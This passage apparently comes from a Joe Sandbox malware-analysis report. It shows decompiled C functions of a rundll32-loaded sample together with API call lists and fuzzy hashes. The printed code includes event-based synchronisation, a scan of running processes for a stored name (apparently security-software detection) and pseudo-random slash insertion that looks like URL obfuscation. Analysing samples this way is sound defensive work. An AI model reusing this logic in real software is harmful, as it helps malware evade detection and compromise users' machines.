                                          						goto L21;
                                          					}
                                          					_t36 = E04BF58BE(0x1000);
                                          					_v16 = _t36;
                                          					if(_t36 == 0) {
                                          						_t58 = 8;
                                          						L18:
                                          						_t37 = _v12;
                                          						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                          						goto L21;
                                          					}
                                          					_push(0);
                                          					_push(_v8);
                                          					_push( &_v20);
                                          					while(1) {
                                          						_t39 = _v12;
                                          						_t56 =  *_t39;
                                          						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                          						ResetEvent( *(_t59 + 0x1c));
                                          						_push( &_v8);
                                          						_push(0x1000);
                                          						_push(_v16);
                                          						_push( *((intOrPtr*)(_t59 + 0x18)));
                                          						if( *0x4bfd138() != 0) {
                                          							goto L13;
                                          						}
                                          						_t58 = GetLastError();
                                          						if(_t58 != 0x3e5) {
                                          							L15:
                                          							E04BF147E(_v16);
                                          							if(_t58 == 0) {
                                          								_t58 = E04BF16DB(_v12, _t59);
                                          							}
                                          							goto L18;
                                          						}
                                          						_t58 = E04BF9D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						L13:
                                          						_t58 = 0;
                                          						if(_v8 == 0) {
                                          							goto L15;
                                          						}
                                          						_push(0);
                                          						_push(_v8);
                                          						_push(_v16);
                                          					}
                                          				}
                                          				_t58 = GetLastError();
                                          				if(_t58 != 0x3e5) {
                                          					L4:
                                          					if(_t58 != 0) {
                                          						goto L21;
                                          					}
                                          					goto L5;
                                          				}
                                          				_t58 = E04BF9D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
                                          				if(_t58 != 0) {
                                          					goto L21;
                                          				}
                                          				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          				goto L4;
                                          			}















                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 04BF8F1E
                                          • GetLastError.KERNEL32 ref: 04BF8F37
                                            • Part of subcall function 04BF9D3A: WaitForMultipleObjects.KERNEL32(00000002,04BFAA33,00000000,04BFAA33,?,?,?,04BFAA33,0000EA60), ref: 04BF9D55
                                          • ResetEvent.KERNEL32(?), ref: 04BF8FB0
                                          • GetLastError.KERNEL32 ref: 04BF8FCB
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: dfdb56ba1000d2c9aedea02468ae4cd9ec5abdb7f52f29ac70189ec7cb75d143
                                          • Instruction ID: 117e82ec3c102b0f6c622abce3e06be41fd88a7657e8cf2fe871262f22c6fa83
                                          • Opcode Fuzzy Hash: dfdb56ba1000d2c9aedea02468ae4cd9ec5abdb7f52f29ac70189ec7cb75d143
                                          • Instruction Fuzzy Hash: 9931A772600604AFDB229FB8CC44F5E77B9FF88354F1405A9EA59D7190EB70F9499B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E04BF72F2(signed int _a4, signed int* _a8) {
                                          				void* __ecx;
                                          				void* __edi;
                                          				signed int _t6;
                                          				intOrPtr _t8;
                                          				intOrPtr _t12;
                                          				short* _t19;
                                          				void* _t25;
                                          				signed int* _t28;
                                          				CHAR* _t30;
                                          				long _t31;
                                          				intOrPtr* _t32;
                                          
                                          				_t6 =  *0x4bfd270; // 0xd448b889
                                          				_t32 = _a4;
                                          				_a4 = _t6 ^ 0x109a6410;
                                          				_t8 =  *0x4bfd2a4; // 0x24da5a8
                                          				_t3 = _t8 + 0x4bfe836; // 0x61636f4c
                                          				_t25 = 0;
                                          				_t30 = E04BF6AF7(_t3, 1);
                                          				if(_t30 != 0) {
                                          					_t25 = CreateEventA(0x4bfd2a8, 1, 0, _t30);
                                          					E04BF147E(_t30);
                                          				}
                                          				_t12 =  *0x4bfd25c; // 0x4000000a
                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04BF56A2() != 0) {
                                          					L12:
                                          					_t28 = _a8;
                                          					if(_t28 != 0) {
                                          						 *_t28 =  *_t28 | 0x00000001;
                                          					}
                                          					_t31 = E04BF1493(_t32, 0);
                                          					if(_t31 == 0 && _t25 != 0) {
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          					}
                                          					if(_t28 != 0 && _t31 != 0) {
                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                          					}
                                          					goto L20;
                                          				} else {
                                          					_t19 =  *0x4bfd110( *_t32, 0x20);
                                          					if(_t19 != 0) {
                                          						 *_t19 = 0;
                                          						_t19 = _t19 + 2;
                                          					}
                                          					_t31 = E04BF7827(0,  *_t32, _t19, 0);
                                          					if(_t31 == 0) {
                                          						if(_t25 == 0) {
                                          							L22:
                                          							return _t31;
                                          						}
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          						if(_t31 == 0) {
                                          							L20:
                                          							if(_t25 != 0) {
                                          								CloseHandle(_t25);
                                          							}
                                          							goto L22;
                                          						}
                                          					}
                                          					goto L12;
                                          				}
                                          			}















                                          APIs
                                            • Part of subcall function 04BF6AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04BF2098,74666F53,00000000,?,04BFD00C,?,?), ref: 04BF6B2D
                                            • Part of subcall function 04BF6AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 04BF6B51
                                            • Part of subcall function 04BF6AF7: lstrcat.KERNEL32(00000000,00000000), ref: 04BF6B59
                                          • CreateEventA.KERNEL32(04BFD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04BF555B,?,?,?), ref: 04BF7333
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04BF555B,00000000,00000000,?,00000000,?,04BF555B,?,?,?), ref: 04BF7393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04BF555B,?,?,?), ref: 04BF73C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04BF555B,?,?,?), ref: 04BF73D9
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: 88e760ff353ff5aeebf2d6b5c3c2df8f7a0ff6eb0a67e308d3e9792a0db07fbf
                                          • Instruction ID: 11d668d2797a83c3a4c12217cf76d6ed753949f119b17b40063dd7ed58285f74
                                          • Opcode Fuzzy Hash: 88e760ff353ff5aeebf2d6b5c3c2df8f7a0ff6eb0a67e308d3e9792a0db07fbf
                                          • Instruction Fuzzy Hash: 3421E332600246BBDB315E7C9C84A6A72A9EB88714B0506F5FF1ED7144DF64EC0B86A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E04BFA1F1(void* __ecx, void* __esi) {
                                          				char _v8;
                                          				long _v12;
                                          				char _v16;
                                          				long _v20;
                                          				long _t34;
                                          				long _t39;
                                          				long _t42;
                                          				long _t56;
                                          				intOrPtr _t58;
                                          				void* _t59;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          
                                          				_t61 = __esi;
                                          				_t59 = __ecx;
                                          				_t60 =  *0x4bfd140; // 0x4bfad41
                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                          				do {
                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                          					_v20 = _t34;
                                          					if(_t34 != 0) {
                                          						L3:
                                          						_push( &_v16);
                                          						_push( &_v8);
                                          						_push(_t61 + 0x2c);
                                          						_push(0x20000013);
                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                          						_v8 = 4;
                                          						_v16 = 0;
                                          						if( *_t60() == 0) {
                                          							_t39 = GetLastError();
                                          							_v12 = _t39;
                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                          								L15:
                                          								return _v12;
                                          							} else {
                                          								goto L11;
                                          							}
                                          						}
                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                          							goto L11;
                                          						} else {
                                          							_v16 = 0;
                                          							_v8 = 0;
                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                          							_t58 = E04BF58BE(_v8 + 1);
                                          							if(_t58 == 0) {
                                          								_v12 = 8;
                                          							} else {
                                          								_push( &_v16);
                                          								_push( &_v8);
                                          								_push(_t58);
                                          								_push(0x16);
                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                          								if( *_t60() == 0) {
                                          									E04BF147E(_t58);
                                          									_v12 = GetLastError();
                                          								} else {
                                          									 *((char*)(_t58 + _v8)) = 0;
                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                          								}
                                          							}
                                          							goto L15;
                                          						}
                                          					}
                                          					SetEvent( *(_t61 + 0x1c));
                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                          					_v12 = _t56;
                                          					if(_t56 != 0) {
                                          						goto L15;
                                          					}
                                          					goto L3;
                                          					L11:
                                          					_t42 = E04BF9D3A( *(_t61 + 0x1c), _t59, 0xea60);
                                          					_v12 = _t42;
                                          				} while (_t42 == 0);
                                          				goto L15;
                                          			}
















                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 04BFA208
                                          • SetEvent.KERNEL32(?), ref: 04BFA218
                                          • GetLastError.KERNEL32 ref: 04BFA2A1
                                            • Part of subcall function 04BF9D3A: WaitForMultipleObjects.KERNEL32(00000002,04BFAA33,00000000,04BFAA33,?,?,?,04BFAA33,0000EA60), ref: 04BF9D55
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          • GetLastError.KERNEL32(00000000), ref: 04BFA2D6
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 928bc335ac82a7c6d7fd859fde2c44123aa99b7e1dc081f8554618fbd843e6b0
                                          • Instruction ID: 005407e0ebef041e3aa2b9e7b827a7739755c7c7fc65b6857c93c009598114b5
                                          • Opcode Fuzzy Hash: 928bc335ac82a7c6d7fd859fde2c44123aa99b7e1dc081f8554618fbd843e6b0
                                          • Instruction Fuzzy Hash: E031F475B00209EFDF21DFE5CCC499EBBB8FB09304F1049AAD64AA2141D735BA499F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E04BF54AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                          				intOrPtr _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				char _v32;
                                          				void* __esi;
                                          				void* _t29;
                                          				void* _t38;
                                          				signed int* _t39;
                                          				void* _t40;
                                          
                                          				_t36 = __ecx;
                                          				_v32 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v12 = _a4;
                                          				_t38 = E04BF4F1F(__ecx,  &_v32);
                                          				if(_t38 != 0) {
                                          					L12:
                                          					_t39 = _a8;
                                          					L13:
                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                          						_t23 =  &(_t39[1]);
                                          						if(_t39[1] != 0) {
                                          							E04BF5749(_t23);
                                          						}
                                          					}
                                          					return _t38;
                                          				}
                                          				if(E04BF9138(0x40,  &_v16) != 0) {
                                          					_v16 = 0;
                                          				}
                                          				_t40 = CreateEventA(0x4bfd2a8, 1, 0,  *0x4bfd340);
                                          				if(_t40 != 0) {
                                          					SetEvent(_t40);
                                          					Sleep(0xbb8);
                                          					CloseHandle(_t40);
                                          				}
                                          				_push( &_v32);
                                          				if(_a12 == 0) {
                                          					_t29 = E04BF9575(_t36);
                                          				} else {
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_t29 = E04BFA642(_t36);
                                          				}
                                          				_t41 = _v16;
                                          				_t38 = _t29;
                                          				if(_v16 != 0) {
                                          					E04BF568A(_t41);
                                          				}
                                          				if(_t38 != 0) {
                                          					goto L12;
                                          				} else {
                                          					_t39 = _a8;
                                          					_t38 = E04BF72F2( &_v32, _t39);
                                          					goto L13;
                                          				}
                                          			}













                                          APIs
                                          • CreateEventA.KERNEL32(04BFD2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 04BF54FD
                                          • SetEvent.KERNEL32(00000000), ref: 04BF550A
                                          • Sleep.KERNEL32(00000BB8), ref: 04BF5515
                                          • CloseHandle.KERNEL32(00000000), ref: 04BF551C
                                            • Part of subcall function 04BF9575: WaitForSingleObject.KERNEL32(00000000,?,?,?,04BF553C,?,04BF553C,?,?,?,?,?,04BF553C,?), ref: 04BF964F
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: 76cd870a08a598a85b39ae3b8932daf28630342b5bc2ca119cc0f2786c13aadc
                                          • Instruction ID: 5275a9ac1e729782508d4c96f49afa57c644d009351df84609072d6426e56775
                                          • Opcode Fuzzy Hash: 76cd870a08a598a85b39ae3b8932daf28630342b5bc2ca119cc0f2786c13aadc
                                          • Instruction Fuzzy Hash: 54215672D00119BBDB20AFF4DC84A9E777EEF44354B0544A5EB1EA7101D634FA498BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E04BF4858(unsigned int __eax, void* __ecx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				signed int _t21;
                                          				signed short _t23;
                                          				char* _t27;
                                          				void* _t29;
                                          				void* _t30;
                                          				unsigned int _t33;
                                          				void* _t37;
                                          				unsigned int _t38;
                                          				void* _t41;
                                          				void* _t42;
                                          				int _t45;
                                          				void* _t46;
                                          
                                          				_t42 = __eax;
                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                          				_t38 = __eax;
                                          				_t30 = RtlAllocateHeap( *0x4bfd238, 0, (__eax >> 3) + __eax + 1);
                                          				_v12 = _t30;
                                          				if(_t30 != 0) {
                                          					_v8 = _t42;
                                          					do {
                                          						_t33 = 0x18;
                                          						if(_t38 <= _t33) {
                                          							_t33 = _t38;
                                          						}
                                          						_t21 =  *0x4bfd250; // 0xc9e88f3a
                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                          						 *0x4bfd250 = _t23;
                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                          						memcpy(_t30, _v8, _t45);
                                          						_v8 = _v8 + _t45;
                                          						_t27 = _t30 + _t45;
                                          						_t38 = _t38 - _t45;
                                          						_t46 = _t46 + 0xc;
                                          						 *_t27 = 0x2f;
                                          						_t13 = _t27 + 1; // 0x1
                                          						_t30 = _t13;
                                          					} while (_t38 > 8);
                                          					memcpy(_t30, _v8, _t38 + 1);
                                          				}
                                          				return _v12;
                                          			}


















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BF4DBF,00000000,?,?,04BF52FE,?,070D95B0), ref: 04BF4863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BF487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04BF4DBF,00000000,?,?,04BF52FE,?,070D95B0), ref: 04BF48BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 04BF48E0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 1b715f6abbfb511567cabfdf42d0faa8abf1804bb35fed24ba11cd88ff677278
                                          • Instruction ID: 07bad5fcc4e4d80f535275682eb3759f59b2956f524a2906dddf2ac3f3a0433b
                                          • Opcode Fuzzy Hash: 1b715f6abbfb511567cabfdf42d0faa8abf1804bb35fed24ba11cd88ff677278
                                          • Instruction Fuzzy Hash: 9811A372A00158AFD7108BA9DD84D9EBFAEEBA0350B4541A6F60997240E7749E0497A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E04BF6AF7(intOrPtr _a4, intOrPtr _a8) {
                                          				char _v20;
                                          				void* _t8;
                                          				void* _t13;
                                          				void* _t16;
                                          				char* _t18;
                                          				void* _t19;
                                          
                                          				_t19 = 0x27;
                                          				_t1 =  &_v20; // 0x74666f53
                                          				_t18 = 0;
                                          				E04BF6F89(_t8, _t1);
                                          				_t16 = E04BF58BE(_t19);
                                          				if(_t16 != 0) {
                                          					_t3 =  &_v20; // 0x74666f53
                                          					_t13 = E04BF9038(_t3, _t16, _a8);
                                          					if(_a4 != 0) {
                                          						__imp__(_a4);
                                          						_t19 = _t13 + 0x27;
                                          					}
                                          					_t18 = E04BF58BE(_t19);
                                          					if(_t18 != 0) {
                                          						 *_t18 = 0;
                                          						if(_a4 != 0) {
                                          							__imp__(_t18, _a4);
                                          						}
                                          						__imp__(_t18, _t16);
                                          					}
                                          					E04BF147E(_t16);
                                          				}
                                          				return _t18;
                                          			}










                                          APIs
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                            • Part of subcall function 04BF9038: wsprintfA.USER32 ref: 04BF9094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04BF2098,74666F53,00000000,?,04BFD00C,?,?), ref: 04BF6B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04BF6B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04BF6B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: 53b256f1c002350a3c2614275f6fd6a70f22797436560e1a954018737d6d6dd1
                                          • Instruction ID: 62d70cf7ceec48bd10ccc6051448358c8e82ea8622781299389b8446da0b5559
                                          • Opcode Fuzzy Hash: 53b256f1c002350a3c2614275f6fd6a70f22797436560e1a954018737d6d6dd1
                                          • Instruction Fuzzy Hash: 1E01A232100109BBDB222AB89C88EEE3B6CEF84349F0444A1FF0C56106DB39995A87A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E04BF56A2() {
                                          				char _v264;
                                          				void* _v300;
                                          				int _t8;
                                          				intOrPtr _t9;
                                          				int _t15;
                                          				void* _t17;
                                          
                                          				_t15 = 0;
                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                          				if(_t17 != 0) {
                                          					_t8 = Process32First(_t17,  &_v300);
                                          					while(_t8 != 0) {
                                          						_t9 =  *0x4bfd2a4; // 0x24da5a8
                                          						_t2 = _t9 + 0x4bfee38; // 0x73617661
                                          						_push( &_v264);
                                          						if( *0x4bfd0fc() != 0) {
                                          							_t15 = 1;
                                          						} else {
                                          							_t8 = Process32Next(_t17,  &_v300);
                                          							continue;
                                          						}
                                          						L7:
                                          						CloseHandle(_t17);
                                          						goto L8;
                                          					}
                                          					goto L7;
                                          				}
                                          				L8:
                                          				return _t15;
                                          			}










                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04BF56B2
                                          • Process32First.KERNEL32(00000000,?), ref: 04BF56C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 04BF56F1
                                          • CloseHandle.KERNEL32(00000000), ref: 04BF5700
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 1d06a3991733cdcf18f7f9b0ac448dd9c265c7bc9a3655e0fe30930252da42bd
                                          • Instruction ID: 7b31753ef4b2cc2b4542ebd145ef98b8f91daa001e9302e2ebe747e7b10ed92b
                                          • Opcode Fuzzy Hash: 1d06a3991733cdcf18f7f9b0ac448dd9c265c7bc9a3655e0fe30930252da42bd
                                          • Instruction Fuzzy Hash: 6DF09672601125BAE730A67A9C48DEB77ACDB85354F000092EF1DC3041F624E94E86B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04BF7283(void* __esi) {
                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                          				void* _t8;
                                          				void* _t10;
                                          
                                          				_v4 = 0;
                                          				memset(__esi, 0, 0x38);
                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                          				 *(__esi + 0x1c) = _t8;
                                          				if(_t8 != 0) {
                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                          					 *(__esi + 0x20) = _t10;
                                          					if(_t10 == 0) {
                                          						CloseHandle( *(__esi + 0x1c));
                                          					} else {
                                          						_v4 = 1;
                                          					}
                                          				}
                                          				return _v4;
                                          			}







                                          APIs
                                          • memset.NTDLL ref: 04BF7291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 04BF72A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04BF72B3
                                          • CloseHandle.KERNEL32(?), ref: 04BF72C5
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 1557f8263caea180e8a06d363d776dcbaee42d740f6d43221bf13094d10ceabe
                                          • Instruction ID: 9ef8d82f2c96ecdfa784caddba80cc31de495cbab77ea8cb82ce661c0e2f2103
                                          • Opcode Fuzzy Hash: 1557f8263caea180e8a06d363d776dcbaee42d740f6d43221bf13094d10ceabe
                                          • Instruction Fuzzy Hash: B1F0F4B110430CBFD7105F75DCC4C2BBBECFB561A8B11496EF54682511DA75A8494A70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E04BFA2EF(int __eax, char _a4) {
                                          				void* _v0;
                                          				void* _t12;
                                          				int _t13;
                                          				int _t14;
                                          
                                          				_t1 =  &_a4; // 0x4d283a53
                                          				_t14 = __eax;
                                          				__imp__( *_t1);
                                          				_t13 = __eax;
                                          				if(__eax > __eax) {
                                          					_t14 = __eax;
                                          				}
                                          				_t2 = _t14 + 1; // 0x1
                                          				_t12 = E04BF58BE(_t2);
                                          				if(_t12 != 0) {
                                          					memcpy(_t12, _v0, _t13);
                                          					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
                                          				}
                                          				return _t12;
                                          			}








                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,04BF9AA8,00000000,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40), ref: 04BFA2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,04BF4A8B,?,?,?,4D283A53,?,?), ref: 04BFA31B
                                          • memset.NTDLL ref: 04BFA32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: b83db2a390ac3eb4caa5e574efc7217891c43f2aa9a7147ab627b44af3201878
                                          • Instruction ID: 8b38aeae01c86c183f6e45a15e9f6f5b81030ca7f19a56a104d69d238ea894e9
                                          • Opcode Fuzzy Hash: b83db2a390ac3eb4caa5e574efc7217891c43f2aa9a7147ab627b44af3201878
                                          • Instruction Fuzzy Hash: 25E0E573A053256BD630A9B85C88D4F3AACDBD8254B004866FF0DD7204E620DC1C82B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04BF78AD() {
                                          				void* _t1;
                                          				intOrPtr _t5;
                                          				void* _t6;
                                          				void* _t7;
                                          				void* _t11;
                                          
                                          				_t1 =  *0x4bfd26c; // 0x3d0
                                          				if(_t1 == 0) {
                                          					L8:
                                          					return 0;
                                          				}
                                          				SetEvent(_t1);
                                          				_t11 = 0x7fffffff;
                                          				while(1) {
                                          					SleepEx(0x64, 1);
